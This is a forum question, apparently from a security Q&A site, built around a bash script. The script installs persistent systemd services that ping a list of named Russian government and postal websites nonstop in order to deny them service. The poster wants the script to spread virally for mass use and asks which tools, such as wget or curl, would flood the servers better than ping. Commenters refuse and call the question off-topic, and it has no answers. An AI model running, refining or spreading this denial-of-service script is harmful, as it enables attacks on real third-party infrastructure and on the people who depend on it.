1

The following code:

#!/usr/bin/bash

TARGETS=("nalog.gov.ru" "www.nalog.gov.ru" 
"customs.gov.ru" "www.customs.gov.ru"
"ffs.ru" "www.ffs.ru"
"crimea-post.ru" "www.crimea-post.ru"
"minfin.gov.ru" "www.minfin.gov.ru")

echo "This script is going to daemonize in order to accomplish denial-of-service."
for t in "${TARGETS[@]}"
do
  echo "ping ${t}"
done

echo -e ".\nPress 'n' now if you do not agree and I'll exit."

read choice

if [[ "${choice}" == 'n' ]]; then 
  echo "Exiting. Run me again when you change your mind." && exit 0
fi

for t in "${TARGETS[@]}"
do
    echo  "[Unit]
Description=${t}

[Service]
User=$(whoami)
ExecStart=ping ${t} 

[Install]
WantedBy=multi-user.target" |sudo tee /etc/systemd/system/${t}.service &&
sudo systemctl enable ${t} && sudo systemctl start ${t}

done

for t in "${TARGETS[@]}"
do
  echo "Type sudo systemctl disable/enable/start/status/stop/ ${t} to manage the services accordingly."
done

The script is meant to be posted on forums / social media and to be spread via messengers like whatsapp, signal etc. It is meant to spread virally as meme with the aim of being run for many hours a day by the millions of it resolved users that are distributed around the world.

I've noticed that no packets are send back from some of the websites that are in TARGETS, notably nalog.gov.ru, even though I've pinged them two times in total, only for reconnaisance, and always with -c 1.

Bearing in mind that this is not a place for refining attack scripts - what other tools (wget curl?) might be suitable for overwhelming a server that has apparently disabled its functionality of them being pinged. What other options can be as easy deployed as ping in such script? What are the pros and cons of such options when compared to ping?

John Smith
  • 131
  • 5
John Smith
  • 11
  • 1
  • 2
    *"Given the current geopolitics it is meant to spread virally .... "* - while you intentions might be noble this is a) not the place for political statements and b) not the place to post and refine attacks scripts. Please note also that such scripts can easily be modified and used against other targets, causing damage in places not intended by you. – Steffen Ullrich Feb 26 '22 at 20:46
  • @SteffenUllrich I already edited the question in response to your worthy comment. I removed the mention of the geopolitics and I also made the question less personal by removing the mention that the OP wrote the code. – John Smith Feb 26 '22 at 21:01
  • 2
    @JohnSmith: still, your question is clearly about ways to attack systems and bypass security measures - and clearly not about defending against such attacks. Such questions are off-topic here. Also, please use the same user when asking and editing a question, so that the edits to your own question do not need to be approved by others. – Steffen Ullrich Feb 26 '22 at 21:08
  • 1
    This is still a "how do I DDoS a random target?" question. – schroeder Feb 26 '22 at 21:44

0 Answers0